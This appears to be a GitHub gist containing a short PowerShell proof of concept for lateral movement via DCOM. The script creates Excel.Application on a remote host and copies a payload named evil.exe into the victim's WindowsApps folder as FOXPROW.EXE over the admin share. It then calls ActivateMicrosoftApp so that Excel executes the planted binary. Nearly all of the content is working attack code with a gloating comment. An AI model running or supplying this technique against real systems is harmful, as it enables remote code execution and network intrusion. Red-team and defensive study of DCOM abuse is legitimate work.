Last active
September 14, 2017 15:06
-
-
Save rxwx/518c85863c7eed051361b36a293f15b1 to your computer and use it in GitHub Desktop.
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) | |
# Windows 10 specific, but searches PATH so .. | |
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE | |
$excel.ActivateMicrosoftApp("5") | |
# excel executes your binary :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment